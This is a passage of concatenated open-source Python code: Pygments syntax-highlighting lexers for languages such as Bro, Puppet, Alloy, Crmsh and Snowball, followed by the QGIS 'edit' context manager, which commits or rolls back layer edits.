            (r'/\*[\w\W]*?\*/', Comment.Multiline),
        ],
        'stringescape': [
            (r'\\([\\nrt"\'])', String.Escape),
        ],
        'dqs': [
            (r'"', String.Double, '#pop'),
            (r'[^\\"\n]+', String.Double),
        ],
        'sqs': [
            (r"'", String.Single, '#pop'),
            (r'[^\\\'\n]+', String.Single),
        ],
        'namespace': [
            (r'[a-z*](\.\w|\w)*', Name.Namespace, '#pop'),
            default('#pop'),
        ],
        'class': [
            (r'[a-zA-Z_]\w*', Name.Class, '#pop'),
            default('#pop'),
        ],
        'keywords': [
            (r'(async|oneway|extends|throws|required|optional)\b', Keyword),
            (r'(true|false)\b', Keyword.Constant),
            (r'(const|typedef)\b', Keyword.Declaration),
            (words((
                'cpp_namespace', 'cpp_include', 'cpp_type', 'java_package',
                'cocoa_prefix', 'csharp_namespace', 'delphi_namespace',
                'php_namespace', 'py_module', 'perl_package',
                'ruby_namespace', 'smalltalk_category', 'smalltalk_prefix',
                'xsd_all', 'xsd_optional', 'xsd_nillable', 'xsd_namespace',
                'xsd_attrs', 'include'), suffix=r'\b'),
             Keyword.Namespace),
            (words((
                'void', 'bool', 'byte', 'i16', 'i32', 'i64', 'double',
                'string', 'binary', 'map', 'list', 'set', 'slist',
                'senum'), suffix=r'\b'),
             Keyword.Type),
            (words((
                'BEGIN', 'END', '__CLASS__', '__DIR__', '__FILE__',
                '__FUNCTION__', '__LINE__', '__METHOD__', '__NAMESPACE__',
                'abstract', 'alias', 'and', 'args', 'as', 'assert', 'begin',
                'break', 'case', 'catch', 'class', 'clone', 'continue',
                'declare', 'def', 'default', 'del', 'delete', 'do', 'dynamic',
                'elif', 'else', 'elseif', 'elsif', 'end', 'enddeclare',
                'endfor', 'endforeach', 'endif', 'endswitch', 'endwhile',
                'ensure', 'except', 'exec', 'finally', 'float', 'for',
                'foreach', 'function', 'global', 'goto', 'if', 'implements',
                'import', 'in', 'inline', 'instanceof', 'interface', 'is',
                'lambda', 'module', 'native', 'new', 'next', 'nil', 'not',
                'or', 'pass', 'public', 'print', 'private', 'protected',
                'raise', 'redo', 'rescue', 'retry', 'register', 'return',
                'self', 'sizeof', 'static', 'super', 'switch', 'synchronized',
                'then', 'this', 'throw', 'transient', 'try', 'undef',
                'unless', 'unsigned', 'until', 'use', 'var', 'virtual',
                'volatile', 'when', 'while', 'with', 'xor', 'yield'),
                prefix=r'\b', suffix=r'\b'),
             Keyword.Reserved),
        ],
        'numbers': [
            (r'[+-]?(\d+\.\d+([eE][+-]?\d+)?|\.?\d+[eE][+-]?\d+)', Number.Float),
            (r'[+-]?0x[0-9A-Fa-f]+', Number.Hex),
            (r'[+-]?[0-9]+', Number.Integer),
        ],
    }
class BroLexer(RegexLexer):
    """
    For `Bro <http://bro-ids.org/>`_ scripts.

    .. versionadded:: 1.5
    """
    name = 'Bro'
    aliases = ['bro']
    filenames = ['*.bro']

    # Reused regex fragments: hex digit, float literal, hostname label.
    _hex = r'[0-9a-fA-F_]'
    _float = r'((\d*\.?\d+)|(\d+\.?\d*))([eE][-+]?\d+)?'
    _h = r'[A-Za-z0-9][-A-Za-z0-9]*'

    tokens = {
        'root': [
            # Whitespace
            (r'^@.*?\n', Comment.Preproc),
            (r'#.*?\n', Comment.Single),
            (r'\n', Text),
            (r'\s+', Text),
            (r'\\\n', Text),
            # Keywords
            (r'(add|alarm|break|case|const|continue|delete|do|else|enum|event'
             r'|export|for|function|if|global|hook|local|module|next'
             r'|of|print|redef|return|schedule|switch|type|when|while)\b', Keyword),
            (r'(addr|any|bool|count|counter|double|file|int|interval|net'
             r'|pattern|port|record|set|string|subnet|table|time|timer'
             r'|vector)\b', Keyword.Type),
            (r'(T|F)\b', Keyword.Constant),
            (r'(&)((?:add|delete|expire)_func|attr|(?:create|read|write)_expire'
             r'|default|disable_print_hook|raw_output|encrypt|group|log'
             r'|mergeable|optional|persistent|priority|redef'
             r'|rotate_(?:interval|size)|synchronized)\b',
             bygroups(Punctuation, Keyword)),
            (r'\s+module\b', Keyword.Namespace),
            # Addresses, ports and networks
            (r'\d+/(tcp|udp|icmp|unknown)\b', Number),
            (r'(\d+\.){3}\d+', Number),
            (r'(' + _hex + r'){7}' + _hex, Number),
            (r'0x' + _hex + r'(' + _hex + r'|:)*::(' + _hex + r'|:)*', Number),
            (r'((\d+|:)(' + _hex + r'|:)*)?::(' + _hex + r'|:)*', Number),
            (r'(\d+\.\d+\.|(\d+\.){2}\d+)', Number),
            # Hostnames
            (_h + r'(\.' + _h + r')+', String),
            # Numeric
            (_float + r'\s+(day|hr|min|sec|msec|usec)s?\b', Literal.Date),
            (r'0[xX]' + _hex, Number.Hex),
            (_float, Number.Float),
            (r'\d+', Number.Integer),
            (r'/', String.Regex, 'regex'),
            (r'"', String, 'string'),
            # Operators
            (r'[!%*/+:<=>?~|-]', Operator),
            (r'([-+=&|]{2}|[+=!><-]=)', Operator),
            (r'(in|match)\b', Operator.Word),
            (r'[{}()\[\]$.,;]', Punctuation),
            # Identfier
            (r'([_a-zA-Z]\w*)(::)', bygroups(Name, Name.Namespace)),
            (r'[a-zA-Z_]\w*', Name)
        ],
        'string': [
            (r'"', String, '#pop'),
            (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape),
            (r'[^\\"\n]+', String),
            (r'\\\n', String),
            (r'\\', String)
        ],
        'regex': [
            (r'/', String.Regex, '#pop'),
            (r'\\[\\nt/]', String.Regex),  # String.Escape is too intense here.
            (r'[^\\/\n]+', String.Regex),
            (r'\\\n', String.Regex),
            (r'\\', String.Regex)
        ]
    }
class PuppetLexer(RegexLexer):
    """
    For `Puppet <http://puppetlabs.com/>`__ configuration DSL.

    .. versionadded:: 1.6
    """
    name = 'Puppet'
    aliases = ['puppet']
    filenames = ['*.pp']

    # Single 'root' state built from includes; no sub-states are pushed.
    tokens = {
        'root': [
            include('comments'),
            include('keywords'),
            include('names'),
            include('numbers'),
            include('operators'),
            include('strings'),

            (r'[]{}:(),;[]', Punctuation),
            (r'[^\S\n]+', Text),
        ],

        'comments': [
            (r'\s*#.*$', Comment),
            (r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline),
        ],

        'operators': [
            (r'(=>|\?|<|>|=|\+|-|/|\*|~|!|\|)', Operator),
            (r'(in|and|or|not)\b', Operator.Word),
        ],

        'names': [
            (r'[a-zA-Z_]\w*', Name.Attribute),
            (r'(\$\S+)(\[)(\S+)(\])', bygroups(Name.Variable, Punctuation,
                                               String, Punctuation)),
            (r'\$\S+', Name.Variable),
        ],

        'numbers': [
            # Copypasta from the Python lexer
            (r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?j?', Number.Float),
            (r'\d+[eE][+-]?[0-9]+j?', Number.Float),
            (r'0[0-7]+j?', Number.Oct),
            (r'0[xX][a-fA-F0-9]+', Number.Hex),
            (r'\d+L', Number.Integer.Long),
            (r'\d+j?', Number.Integer)
        ],

        'keywords': [
            # Left out 'group' and 'require'
            # Since they're often used as attributes
            (words((
                'absent', 'alert', 'alias', 'audit', 'augeas', 'before', 'case',
                'check', 'class', 'computer', 'configured', 'contained',
                'create_resources', 'crit', 'cron', 'debug', 'default',
                'define', 'defined', 'directory', 'else', 'elsif', 'emerg',
                'err', 'exec', 'extlookup', 'fail', 'false', 'file',
                'filebucket', 'fqdn_rand', 'generate', 'host', 'if', 'import',
                'include', 'info', 'inherits', 'inline_template', 'installed',
                'interface', 'k5login', 'latest', 'link', 'loglevel',
                'macauthorization', 'mailalias', 'maillist', 'mcx', 'md5',
                'mount', 'mounted', 'nagios_command', 'nagios_contact',
                'nagios_contactgroup', 'nagios_host', 'nagios_hostdependency',
                'nagios_hostescalation', 'nagios_hostextinfo', 'nagios_hostgroup',
                'nagios_service', 'nagios_servicedependency', 'nagios_serviceescalation',
                'nagios_serviceextinfo', 'nagios_servicegroup', 'nagios_timeperiod',
                'node', 'noop', 'notice', 'notify', 'package', 'present', 'purged',
                'realize', 'regsubst', 'resources', 'role', 'router', 'running',
                'schedule', 'scheduled_task', 'search', 'selboolean', 'selmodule',
                'service', 'sha1', 'shellquote', 'split', 'sprintf',
                'ssh_authorized_key', 'sshkey', 'stage', 'stopped', 'subscribe',
                'tag', 'tagged', 'template', 'tidy', 'true', 'undef', 'unmounted',
                'user', 'versioncmp', 'vlan', 'warning', 'yumrepo', 'zfs', 'zone',
                'zpool'), prefix='(?i)', suffix=r'\b'),
             Keyword),
        ],

        'strings': [
            (r'"([^"])*"', String),
            (r"'(\\'|[^'])*'", String),
        ],
    }
class RslLexer(RegexLexer):
    """
    `RSL <http://en.wikipedia.org/wiki/RAISE>`_ is the formal specification
    language used in RAISE (Rigorous Approach to Industrial Software Engineering)
    method.

    .. versionadded:: 2.0
    """
    name = 'RSL'
    aliases = ['rsl']
    filenames = ['*.rsl']
    mimetypes = ['text/rsl']

    flags = re.MULTILINE | re.DOTALL

    # Single flat 'root' state; keywords first so they win over plain names.
    tokens = {
        'root': [
            (words((
                'Bool', 'Char', 'Int', 'Nat', 'Real', 'Text', 'Unit', 'abs',
                'all', 'always', 'any', 'as', 'axiom', 'card', 'case', 'channel',
                'chaos', 'class', 'devt_relation', 'dom', 'elems', 'else', 'elif',
                'end', 'exists', 'extend', 'false', 'for', 'hd', 'hide', 'if',
                'in', 'is', 'inds', 'initialise', 'int', 'inter', 'isin', 'len',
                'let', 'local', 'ltl_assertion', 'object', 'of', 'out', 'post',
                'pre', 'read', 'real', 'rng', 'scheme', 'skip', 'stop', 'swap',
                'then', 'theory', 'test_case', 'tl', 'transition_system', 'true',
                'type', 'union', 'until', 'use', 'value', 'variable', 'while',
                'with', 'write', '~isin', '-inflist', '-infset', '-list',
                '-set'), prefix=r'\b', suffix=r'\b'),
             Keyword),
            (r'(variable|value)\b', Keyword.Declaration),
            (r'--.*?\n', Comment),
            (r'<:.*?:>', Comment),
            (r'\{!.*?!\}', Comment),
            (r'/\*.*?\*/', Comment),
            (r'^[ \t]*([\w]+)[ \t]*:[^:]', Name.Function),
            (r'(^[ \t]*)([\w]+)([ \t]*\([\w\s,]*\)[ \t]*)(is|as)',
             bygroups(Text, Name.Function, Text, Keyword)),
            (r'\b[A-Z]\w*\b', Keyword.Type),
            (r'(true|false)\b', Keyword.Constant),
            (r'".*"', String),
            (r'\'.\'', String.Char),
            (r'(><|->|-m->|/\\|<=|<<=|<\.|\|\||\|\^\||-~->|-~m->|\\/|>=|>>|'
             r'\.>|\+\+|-\\|<->|=>|:-|~=|\*\*|<<|>>=|\+>|!!|\|=\||#)',
             Operator),
            (r'[0-9]+\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float),
            (r'0x[0-9a-f]+', Number.Hex),
            (r'[0-9]+', Number.Integer),
            (r'.', Text),
        ],
    }

    def analyse_text(text):
        """
        Check for the most common text in the beginning of a RSL file.
        """
        if re.search(r'scheme\s*.*?=\s*class\s*type', text, re.I) is not None:
            return 1.0
class MscgenLexer(RegexLexer):
    """
    For `Mscgen <http://www.mcternan.me.uk/mscgen/>`_ files.

    .. versionadded:: 1.6
    """
    name = 'Mscgen'
    aliases = ['mscgen', 'msc']
    filenames = ['*.msc']

    # Entity/attribute name: bare word or double-quoted string.
    _var = r'(\w+|"(?:\\"|[^"])*")'

    tokens = {
        'root': [
            (r'msc\b', Keyword.Type),
            # Options
            (r'(hscale|HSCALE|width|WIDTH|wordwraparcs|WORDWRAPARCS'
             r'|arcgradient|ARCGRADIENT)\b', Name.Property),
            # Operators
            (r'(abox|ABOX|rbox|RBOX|box|BOX|note|NOTE)\b', Operator.Word),
            (r'(\.|-|\|){3}', Keyword),
            (r'(?:-|=|\.|:){2}'
             r'|<<=>>|<->|<=>|<<>>|<:>'
             r'|->|=>>|>>|=>|:>|-x|-X'
             r'|<-|<<=|<<|<=|<:|x-|X-|=', Operator),
            # Names
            (r'\*', Name.Builtin),
            (_var, Name.Variable),
            # Other
            (r'\[', Punctuation, 'attrs'),
            (r'\{|\}|,|;', Punctuation),
            include('comments')
        ],
        'attrs': [
            # Inside [...] attribute lists; ']' pops back to root.
            (r'\]', Punctuation, '#pop'),
            (_var + r'(\s*)(=)(\s*)' + _var,
             bygroups(Name.Attribute, Text.Whitespace, Operator, Text.Whitespace,
                      String)),
            (r',', Punctuation),
            include('comments')
        ],
        'comments': [
            (r'(?://|#).*?\n', Comment.Single),
            (r'/\*(?:.|\n)*?\*/', Comment.Multiline),
            (r'[ \t\r\n]+', Text.Whitespace)
        ]
    }
class VGLLexer(RegexLexer):
    """
    For `SampleManager VGL <http://www.thermoscientific.com/samplemanager>`_
    source code.

    .. versionadded:: 1.6
    """
    name = 'VGL'
    aliases = ['vgl']
    filenames = ['*.rpf']

    flags = re.MULTILINE | re.DOTALL | re.IGNORECASE

    tokens = {
        'root': [
            # { ... } blocks are comments in VGL.
            (r'\{[^}]*\}', Comment.Multiline),
            (r'declare', Keyword.Constant),
            # Keyword alternation.  The negative lookahead keeps a keyword-
            # looking identifier from matching when it is immediately used
            # as a value (followed by =, <, >, ., comma or parentheses).
            # NOTE: 'global' and 'create' were previously listed twice;
            # duplicate alternatives in a regex alternation are redundant
            # and have been removed (the matched language is unchanged).
            (r'(if|then|else|endif|while|do|endwhile|and|or|prompt|object'
             r'|create|on|line|with|global|routine|value|endroutine|constant'
             r'|set|join|library|compile_option|file|exists|copy'
             r'|delete|enable|windows|name|notprotected)(?! *[=<>.,()])',
             Keyword),
            (r'(true|false|null|empty|error|locked)', Keyword.Constant),
            (r'[~^*#!%&\[\]()<>|+=:;,./?-]', Operator),
            (r'"[^"]*"', String),
            # Attribute access: ".name" after a value.
            (r'(\.)([a-z_$][\w$]*)', bygroups(Operator, Name.Attribute)),
            (r'[0-9][0-9]*(\.[0-9]+(e[+\-]?[0-9]+)?)?', Number),
            (r'[a-z_$][\w$]*', Name),
            (r'[\r\n]+', Text),
            (r'\s+', Text)
        ]
    }
class AlloyLexer(RegexLexer):
    """
    For `Alloy <http://alloy.mit.edu>`_ source code.

    .. versionadded:: 2.0
    """

    name = 'Alloy'
    aliases = ['alloy']
    filenames = ['*.als']
    mimetypes = ['text/x-alloy']

    flags = re.MULTILINE | re.DOTALL

    # Alloy identifiers may contain primes (x', x'').
    iden_rex = r'[a-zA-Z_][\w\']*'
    # Horizontal whitespace (anything but newline); shared by all states.
    text_tuple = (r'[^\S\n]+', Text)

    tokens = {
        # After `sig`/`enum`: names, commas and `extends` until the body "{".
        'sig': [
            (r'(extends)\b', Keyword, '#pop'),
            (iden_rex, Name),
            text_tuple,
            (r',', Punctuation),
            (r'\{', Operator, '#pop'),
        ],
        # After `module`/`open`: one module name.
        'module': [
            text_tuple,
            (iden_rex, Name, '#pop'),
        ],
        # After `fun`/`pred`/`fact`/`assert`: optional name, then body "{".
        'fun': [
            text_tuple,
            (r'\{', Operator, '#pop'),
            (iden_rex, Name, '#pop'),
        ],
        'root': [
            (r'--.*?$', Comment.Single),
            (r'//.*?$', Comment.Single),
            (r'/\*.*?\*/', Comment.Multiline),
            text_tuple,
            (r'(module|open)(\s+)', bygroups(Keyword.Namespace, Text),
             'module'),
            (r'(sig|enum)(\s+)', bygroups(Keyword.Declaration, Text), 'sig'),
            (r'(iden|univ|none)\b', Keyword.Constant),
            (r'(int|Int)\b', Keyword.Type),
            (r'(this|abstract|extends|set|seq|one|lone|let)\b', Keyword),
            (r'(all|some|no|sum|disj|when|else)\b', Keyword),
            (r'(run|check|for|but|exactly|expect|as)\b', Keyword),
            (r'(and|or|implies|iff|in)\b', Operator.Word),
            (r'(fun|pred|fact|assert)(\s+)', bygroups(Keyword, Text), 'fun'),
            # Multi-character operators must precede the single-char rule.
            (r'!|#|&&|\+\+|<<|>>|>=|<=>|<=|\.|->', Operator),
            (r'[-+/*%=<>&!^|~{}\[\]().]', Operator),
            (iden_rex, Name),
            (r'[:,]', Punctuation),
            (r'[0-9]+', Number.Integer),
            (r'"(\\\\|\\"|[^"])*"', String),
            (r'\n', Text),
        ]
    }
class PanLexer(RegexLexer):
    """
    Lexer for `pan <http://github.com/quattor/pan/>`_ source files.

    Based on tcsh lexer.

    .. versionadded:: 2.0
    """

    name = 'Pan'
    aliases = ['pan']
    filenames = ['*.pan']

    tokens = {
        'root': [
            include('basic'),
            (r'\(', Keyword, 'paren'),
            (r'\{', Keyword, 'curly'),
            include('data'),
        ],
        'basic': [
            # Language keywords.
            (words((
                'if', 'for', 'with', 'else', 'type', 'bind', 'while', 'valid', 'final',
                'prefix', 'unique', 'object', 'foreach', 'include', 'template',
                'function', 'variable', 'structure', 'extensible', 'declaration'),
                prefix=r'\b', suffix=r'\s*\b'),
             Keyword),
            # Built-in functions.
            (words((
                'file_contents', 'format', 'index', 'length', 'match', 'matches',
                'replace', 'splice', 'split', 'substr', 'to_lowercase', 'to_uppercase',
                'debug', 'error', 'traceback', 'deprecated', 'base64_decode',
                'base64_encode', 'digest', 'escape', 'unescape', 'append', 'create',
                'first', 'nlist', 'key', 'list', 'merge', 'next', 'prepend', 'is_boolean',
                'is_defined', 'is_double', 'is_list', 'is_long', 'is_nlist', 'is_null',
                'is_number', 'is_property', 'is_resource', 'is_string', 'to_boolean',
                'to_double', 'to_long', 'to_string', 'clone', 'delete', 'exists',
                'path_exists', 'if_exists', 'return', 'value'),
                prefix=r'\b', suffix=r'\s*\b'),
             Name.Builtin),
            (r'#.*', Comment),
            (r'\\[\w\W]', String.Escape),
            (r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
            (r'[\[\]{}()=]+', Operator),
            # Heredoc-style strings (<<TAG ... TAG); \2 back-references the tag.
            (r'<<\s*(\'?)\\?(\w+)[\w\W]+?\2', String),
            (r';', Punctuation),
        ],
        'data': [
            # Double- and single-quoted strings with octal and other escapes.
            (r'(?s)"(\\\\|\\[0-7]+|\\.|[^"\\])*"', String.Double),
            (r"(?s)'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
            (r'\s+', Text),
            (r'[^=\s\[\]{}()$"\'`\\;#]+', Text),
            (r'\d+(?= |\Z)', Number),
        ],
        # Inside "{...}": keys, ":-" defaults, and nested root constructs.
        'curly': [
            (r'\}', Keyword, '#pop'),
            (r':-', Keyword),
            (r'\w+', Name.Variable),
            (r'[^}:"\'`$]+', Punctuation),
            (r':', Punctuation),
            include('root'),
        ],
        # Inside "(...)": nested root constructs until the closing paren.
        'paren': [
            (r'\)', Keyword, '#pop'),
            include('root'),
        ],
    }
class CrmshLexer(RegexLexer):
    """
    Lexer for `crmsh <http://crmsh.github.io/>`_ configuration files
    for Pacemaker clusters.

    .. versionadded:: 2.1
    """
    name = 'Crmsh'
    aliases = ['crmsh', 'pcmk']
    filenames = ['*.crmsh', '*.pcmk']
    mimetypes = []

    # Pre-built word-class regexes.  The (?![\w#$-]) lookahead ensures a
    # whole-word match, since crmsh identifiers may contain #, $ and -.
    elem = words((
        'node', 'primitive', 'group', 'clone', 'ms', 'location',
        'colocation', 'order', 'fencing_topology', 'rsc_ticket',
        'rsc_template', 'property', 'rsc_defaults',
        'op_defaults', 'acl_target', 'acl_group', 'user', 'role',
        'tag'), suffix=r'(?![\w#$-])')
    sub = words((
        'params', 'meta', 'operations', 'op', 'rule',
        'attributes', 'utilization'), suffix=r'(?![\w#$-])')
    acl = words(('read', 'write', 'deny'), suffix=r'(?![\w#$-])')
    bin_rel = words(('and', 'or'), suffix=r'(?![\w#$-])')
    un_ops = words(('defined', 'not_defined'), suffix=r'(?![\w#$-])')
    date_exp = words(('in_range', 'date', 'spec', 'in'), suffix=r'(?![\w#$-])')
    # Plain regex fragments interpolated into rules below.
    acl_mod = (r'(?:tag|ref|reference|attribute|type|xpath)')
    bin_ops = (r'(?:lt|gt|lte|gte|eq|ne)')
    val_qual = (r'(?:string|version|number)')
    rsc_role_action = (r'(?:Master|Started|Slave|Stopped|'
                       r'start|promote|demote|stop)')

    tokens = {
        'root': [
            (r'^#.*\n?', Comment),
            # attr=value (nvpair)
            (r'([\w#$-]+)(=)("(?:""|[^"])*"|\S+)',
             bygroups(Name.Attribute, Punctuation, String)),
            # need this construct, otherwise numeric node ids
            # are matched as scores
            # elem id:
            (r'(node)(\s+)([\w#$-]+)(:)',
             bygroups(Keyword, Whitespace, Name, Punctuation)),
            # scores
            (r'([+-]?([0-9]+|inf)):', Number),
            # keywords (elements and other)
            (elem, Keyword),
            (sub, Keyword),
            (acl, Keyword),
            # binary operators, optionally qualified (e.g. string:eq)
            (r'(?:%s:)?(%s)(?![\w#$-])' % (val_qual, bin_ops), Operator.Word),
            # other operators
            (bin_rel, Operator.Word),
            (un_ops, Operator.Word),
            (date_exp, Operator.Word),
            # builtin attributes (e.g. #uname)
            (r'#[a-z]+(?![\w#$-])', Name.Builtin),
            # acl_mod:blah
            (r'(%s)(:)("(?:""|[^"])*"|\S+)' % acl_mod,
             bygroups(Keyword, Punctuation, Name)),
            # rsc_id[:(role|action)]
            # NB: this matches all other identifiers
            (r'([\w#$-]+)(?:(:)(%s))?(?![\w#$-])' % rsc_role_action,
             bygroups(Name, Punctuation, Operator.Word)),
            # punctuation (includes line-continuation backslashes)
            (r'(\\(?=\n)|[\[\](){}/:@])', Punctuation),
            (r'\s+|\n', Whitespace),
        ],
    }
class FlatlineLexer(RegexLexer):
    """
    Lexer for `Flatline <https://github.com/bigmlcom/flatline>`_ expressions.

    .. versionadded:: 2.2
    """
    name = 'Flatline'
    aliases = ['flatline']
    filenames = []
    mimetypes = ['text/x-flatline']

    special_forms = ('let',)

    # Flatline's built-in operators and functions (Lisp-style names).
    builtins = (
        "!=", "*", "+", "-", "<", "<=", "=", ">", ">=", "abs", "acos", "all",
        "all-but", "all-with-defaults", "all-with-numeric-default", "and",
        "asin", "atan", "avg", "avg-window", "bin-center", "bin-count", "call",
        "category-count", "ceil", "cond", "cond-window", "cons", "cos", "cosh",
        "count", "diff-window", "div", "ensure-value", "ensure-weighted-value",
        "epoch", "epoch-day", "epoch-fields", "epoch-hour", "epoch-millisecond",
        "epoch-minute", "epoch-month", "epoch-second", "epoch-weekday",
        "epoch-year", "exp", "f", "field", "field-prop", "fields", "filter",
        "first", "floor", "head", "if", "in", "integer", "language", "length",
        "levenshtein", "linear-regression", "list", "ln", "log", "log10", "map",
        "matches", "matches?", "max", "maximum", "md5", "mean", "median", "min",
        "minimum", "missing", "missing-count", "missing?", "missing_count",
        "mod", "mode", "normalize", "not", "nth", "occurrences", "or",
        "percentile", "percentile-label", "population", "population-fraction",
        "pow", "preferred", "preferred?", "quantile-label", "rand", "rand-int",
        "random-value", "re-quote", "real", "replace", "replace-first", "rest",
        "round", "row-number", "segment-label", "sha1", "sha256", "sin", "sinh",
        "sqrt", "square", "standard-deviation", "standard_deviation", "str",
        "subs", "sum", "sum-squares", "sum-window", "sum_squares", "summary",
        "summary-no", "summary-str", "tail", "tan", "tanh", "to-degrees",
        "to-radians", "variance", "vectorize", "weighted-random-value", "window",
        "winnow", "within-percentiles?", "z-score",
    )

    # Lisp-ish identifiers: almost any symbol character, but not starting
    # with '#'.
    valid_name = r'(?!#)[\w!$%*+<=>?/.#-]+'

    tokens = {
        'root': [
            # whitespaces - usually not relevant
            (r'[,\s]+', Text),
            # numbers
            (r'-?\d+\.\d+', Number.Float),
            (r'-?\d+', Number.Integer),
            (r'0x-?[a-f\d]+', Number.Hex),
            # strings, symbols and characters
            (r'"(\\\\|\\"|[^"])*"', String),
            (r"\\(.|[a-z]+)", String.Char),
            # expression template placeholder
            (r'_', String.Symbol),
            # highlight the special forms
            (words(special_forms, suffix=' '), Keyword),
            # highlight the builtins
            (words(builtins, suffix=' '), Name.Builtin),
            # the remaining functions (a name right after an open paren)
            (r'(?<=\()' + valid_name, Name.Function),
            # find the remaining variables
            (valid_name, Name.Variable),
            # parentheses
            (r'(\(|\))', Punctuation),
        ],
    }
class SnowballLexer(ExtendedRegexLexer):
    """
    Lexer for `Snowball <http://snowballstem.org/>`_ source code.

    .. versionadded:: 2.2
    """

    name = 'Snowball'
    aliases = ['snowball']
    filenames = ['*.sbl']

    # Snowball whitespace characters, interpolated into several rules.
    _ws = r'\n\r\t '

    def __init__(self, **options):
        self._reset_stringescapes()
        ExtendedRegexLexer.__init__(self, **options)

    def _reset_stringescapes(self):
        # The escape-start/escape-end delimiters default to "'" until a
        # `stringescapes` declaration in the source overrides them
        # (see _stringescapes below).
        self._start = "'"
        self._end = "'"

    def _string(do_string_first):
        # Factory for the callbacks used by the 'string' and 'escape'
        # states.  The callback walks the matched text, alternating
        # between plain string content (up to the next escape-start
        # character) and escape sequences (up to the escape-end
        # character), yielding the corresponding tokens.  Note: a callback
        # of an ExtendedRegexLexer, deliberately has no `self`.
        def callback(lexer, match, ctx):
            s = match.start()
            text = match.group()
            string = re.compile(r'([^%s]*)(.)' % re.escape(lexer._start)).match
            escape = re.compile(r'([^%s]*)(.)' % re.escape(lexer._end)).match
            pos = 0
            do_string = do_string_first
            while pos < len(text):
                if do_string:
                    match = string(text, pos)
                    yield s + match.start(1), String.Single, match.group(1)
                    # A bare "'" terminates the string literal entirely.
                    if match.group(2) == "'":
                        yield s + match.start(2), String.Single, match.group(2)
                        ctx.stack.pop()
                        break
                    yield s + match.start(2), String.Escape, match.group(2)
                    pos = match.end()
                match = escape(text, pos)
                yield s + match.start(), String.Escape, match.group()
                # Escape sequence not closed in this match: continue in
                # the 'escape' state on the next callback invocation.
                if match.group(2) != lexer._end:
                    ctx.stack[-1] = 'escape'
                    break
                pos = match.end()
                do_string = True
            ctx.pos = s + match.end()
        return callback

    def _stringescapes(lexer, match, ctx):
        # Record the delimiters declared by `stringescapes X Y` so that
        # subsequent string literals are split correctly, then emit the
        # declaration's own tokens.
        lexer._start = match.group(3)
        lexer._end = match.group(5)
        return bygroups(Keyword.Reserved, Text, String.Escape, Text,
                        String.Escape)(lexer, match, ctx)

    tokens = {
        'root': [
            (words(('len', 'lenof'), suffix=r'\b'), Operator.Word),
            include('root1'),
        ],
        'root1': [
            (r'[%s]+' % _ws, Text),
            (r'\d+', Number.Integer),
            (r"'", String.Single, 'string'),
            (r'[()]', Punctuation),
            (r'/\*[\w\W]*?\*/', Comment.Multiline),
            (r'//.*', Comment.Single),
            (r'[!*+\-/<=>]=|[-=]>|<[+-]|[$*+\-/<=>?\[\]]', Operator),
            (words(('as', 'get', 'hex', 'among', 'define', 'decimal',
                    'backwardmode'), suffix=r'\b'),
             Keyword.Reserved),
            (words(('strings', 'booleans', 'integers', 'routines', 'externals',
                    'groupings'), suffix=r'\b'),
             Keyword.Reserved, 'declaration'),
            (words(('do', 'or', 'and', 'for', 'hop', 'non', 'not', 'set', 'try',
                    'fail', 'goto', 'loop', 'next', 'test', 'true',
                    'false', 'unset', 'atmark', 'attach', 'delete', 'gopast',
                    'insert', 'repeat', 'sizeof', 'tomark', 'atleast',
                    'atlimit', 'reverse', 'setmark', 'tolimit', 'setlimit',
                    'backwards', 'substring'), suffix=r'\b'),
             Operator.Word),
            (words(('size', 'limit', 'cursor', 'maxint', 'minint'),
                   suffix=r'\b'),
             Name.Builtin),
            (r'(stringdef\b)([%s]*)([^%s]+)' % (_ws, _ws),
             bygroups(Keyword.Reserved, Text, String.Escape)),
            (r'(stringescapes\b)([%s]*)(.)([%s]*)(.)' % (_ws, _ws),
             _stringescapes),
            (r'[A-Za-z]\w*', Name),
        ],
        # Inside a declaration list (strings, booleans, ...): names until ")".
        'declaration': [
            (r'\)', Punctuation, '#pop'),
            (words(('len', 'lenof'), suffix=r'\b'), Name,
             ('root1', 'declaration')),
            include('root1'),
        ],
        # String content is tokenized by the _string callbacks, which
        # alternate between these two states as escapes open and close.
        'string': [
            (r"[^']*'", _string(True)),
        ],
        'escape': [
            (r"[^']*'", _string(False)),
        ],
    }

    def get_tokens_unprocessed(self, text=None, context=None):
        # Reset the escape delimiters so one document's `stringescapes`
        # declaration cannot leak into the next lexed document.
        self._reset_stringescapes()
        return ExtendedRegexLexer.get_tokens_unprocessed(self, text, context)
| gpl-3.0 |
dgoedkoop/QGIS | python/core/additions/edit.py | 57 | 1528 | # -*- coding: utf-8 -*-
"""
***************************************************************************
edit.py
---------------------
Date : May 2018
Copyright : (C) 2018 by Denis Rouzaud
Email : denis@opengis.ch
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import object
class QgsEditError(Exception):
    """Raised when an edit session on a layer cannot be completed."""

    def __init__(self, value):
        # Keep the offending value (typically the layer's commit-error
        # list) so callers can inspect it after catching the exception.
        self.value = value

    def __str__(self):
        # Delegate to repr() so lists and strings render unambiguously.
        return "%r" % (self.value,)
class edit(object):
    """Context manager wrapping a layer edit session.

    Starts an edit session on entry and, on exit, commits the changes
    when the managed block finished normally, or rolls them back when it
    raised.  Failures are reported as :class:`QgsEditError`.

    Example::

        with edit(layer) as active_layer:
            ...  # modify active_layer
    """

    def __init__(self, layer):
        self.layer = layer

    def __enter__(self):
        # Explicit check instead of `assert`: assertions are stripped when
        # Python runs with -O, which would silently skip failure detection.
        if not self.layer.startEditing():
            raise QgsEditError('Could not start editing the layer')
        return self.layer

    def __exit__(self, ex_type, ex_value, traceback):
        if ex_type is None:
            # Normal completion: commit, surfacing the layer's commit
            # errors if the commit is refused.
            if not self.layer.commitChanges():
                raise QgsEditError(self.layer.commitErrors())
            return True
        # The managed block raised: discard the edits and let the original
        # exception propagate (returning False does not suppress it).
        self.layer.rollBack()
        return False
| gpl-2.0 |
goldcoin/Goldcoin-GLD | qa/rpc-tests/invalidtxrequest.py | 2 | 2578 | #!/usr/bin/env python3
